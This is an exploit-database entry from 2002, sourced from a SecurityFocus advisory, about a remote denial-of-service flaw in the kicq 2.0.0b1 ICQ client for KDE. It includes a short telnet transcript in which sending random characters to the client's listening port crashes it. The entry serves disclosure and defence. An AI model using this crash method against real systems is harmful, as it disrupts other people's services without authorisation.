kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service

2002-02-02T00:00:00
ID EXPLOITPACK:78F90E8278D84FBFDC9F54A264B62A5A
Type exploitpack
Reporter Rafael San Miguel Carrasco
Modified 2002-02-02T00:00:00

Description

kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/4018/info

kicq 2.0.0b1 is an ICQ client for the K Desktop Environment (KDE). kicq can be crashed remotely by initiating a telnet connection to a port it is listening on and sending "random" characters. This does not affect other components of the system, only the ICQ client.

bash-2.05$ telnet 10.0.0.1 1030
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
garbage
Connection closed by foreign host.